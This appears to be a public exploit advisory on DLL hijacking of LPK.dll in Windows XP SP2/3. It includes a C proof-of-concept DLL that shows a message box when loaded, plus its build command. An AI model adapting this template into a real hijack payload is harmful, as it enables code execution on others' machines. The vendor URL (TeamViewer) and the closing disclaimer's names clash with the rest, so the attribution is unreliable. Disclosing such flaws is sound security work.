Author Word :
This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.
1. ADVISORY INFORMATION
-----------------------
Product: Microsoft Windows XP Professionnel Service Pack 2&3 Insecure Library Load
Vendor URL: http://www.teamviewer.com/fr/index.aspx
Date found: 2013-02-26
Date published: 2013-02-26
2. CREDITS
----------
This vulnerability was discovered and researched by The Black Devils
3. VERSIONS AFFECTED
--------------------
Microsoft Windows XP Professionnel Service Pack 2, older versions may be affected too.
4. VULNERABILITY DESCRIPTION
----------------------------
An insecure library loading vulnerability has been identified in
Microsoft Windows XP Professionnel Service Pack 2.
The application uses a fixed path to look for specific files or
libraries. This path includes directories that may not be trusted or
under user control.
By placing a custom version of a library in the application path, the
program will load it before the legitimate version. This allows an
attacker to inject custom code that will be run with the privilege of
the program or user executing the program. The following libraries could
be hijacked on this way:
LPK.dll
5. PROOF-OF-CONCEPT (CODE / Exploit)
------------------------------------
// wine gcc -Wall -shared inject.c -o LPK.dll
#include <windows.h>
BOOL WINAPI DllMain(HINSTANCE hInstDLL, DWORD dwReason, LPVOID lpvReserved)
{
if (dwReason == DLL_PROCESS_ATTACH)
{
MessageBox(0,"Inj3ctor","The Black Devils", 0);
}
return TRUE;
}
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information